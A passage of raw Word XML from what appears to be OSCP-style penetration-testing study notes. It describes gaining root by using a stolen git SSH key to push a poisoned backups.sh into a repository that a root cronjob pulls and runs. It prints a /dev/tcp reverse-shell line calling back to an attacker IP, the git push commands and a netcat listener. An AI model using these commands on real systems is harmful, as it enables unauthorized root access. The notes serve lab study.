        <w:t xml:space="preserve">GIT_SSH_COMMAND='ssh -i id_rsa -p 43022' git clone git@192.168.93.125:/git-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Malicious Code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside the working copy, they edited backups.sh to add a reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'sh -i &gt;&amp; /dev/tcp/[kali_IP]/8080 0&gt;&amp;1' &gt;&gt; backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then they committed and pushed the change back into the server’s bare repo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003230">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git add -A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003231">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git commit -m "pwn"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GIT_SSH_COMMAND='ssh -i id_rsa -p 43022' git push origin master</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003233">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003234">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Cronjob Execution as Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003235">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="744"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine, the root-owned cronjob was running pull.sh and backups.sh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003236">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="744"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pull.sh ensured the local copy of the repo on the target stayed in sync (i.e., did a git pull).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003237">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="744"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the attacker had pushed their malicious update, the cronjob pulled the poisoned backups.sh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003238">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="744"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Within 3 minutes, cron executed the modified script as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003239">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="744"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The reverse shell connected back to the attacker’s listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="744"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwarp nc -lvnp 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="744"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: full root shell on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Chain Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found root cronjob running scripts from a Git repo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovered repo was bare and managed by git user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003240">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found git user’s private SSH key, used it to access the repo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003241">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloned repo → modified backups.sh → pushed malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003242">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cronjob (running as root) auto-pulled changes and executed script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003243">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious reverse shell triggered → attacker got root access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003244">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003245">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003246">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is GIT_SSH_COMMAND?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003247">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s an environment variable that tells Git which command to use when it needs to make an SSH connection (for clone, fetch, pull, push, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003248">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, Git just runs ssh with the system’s standard configuration (your default key, port 22, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003249">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But if you want Git to use a specific key or non-standard SSH options, you can override it with GIT_SSH_COMMAND.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why was GIT_SSH_COMMAND needed in the attack?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="751"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The git user’s private key (id_rsa) was not the default key in ~/.ssh/.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="751"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If they just ran git clone git@192.168.93.125:/git-server, Git would fail authentication, because it wouldn’t know to use that stolen key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="751"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH was running on a non-standard port (43022).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="751"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Again, the default Git → SSH connection assumes port 22.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003250">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="751"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By setting GIT_SSH_COMMAND, they forced Git to use the stolen key and the correct port for all repo interactions (clone, commit, push, pull).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003251">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003252">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why not login as git user?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003253">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="833"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git could log in, but only via git-shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003254">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="833"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git-shell blocks arbitrary commands, but allows Git repo interactions over SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003255">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="833"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That’s why they didn’t just SSH in and start hacking — instead, they used GIT_SSH_COMMAND locally so that their own Git client could talk to the remote Git server via the restricted shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003256">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003257">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_isuc2lw9arj" w:id="446"/>
      <w:bookmarkEnd w:id="446"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another git example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003258">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003259">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (27.2.2. A Link to the Past)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="774700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="387" name="image378.png"/>
            <a:graphic>
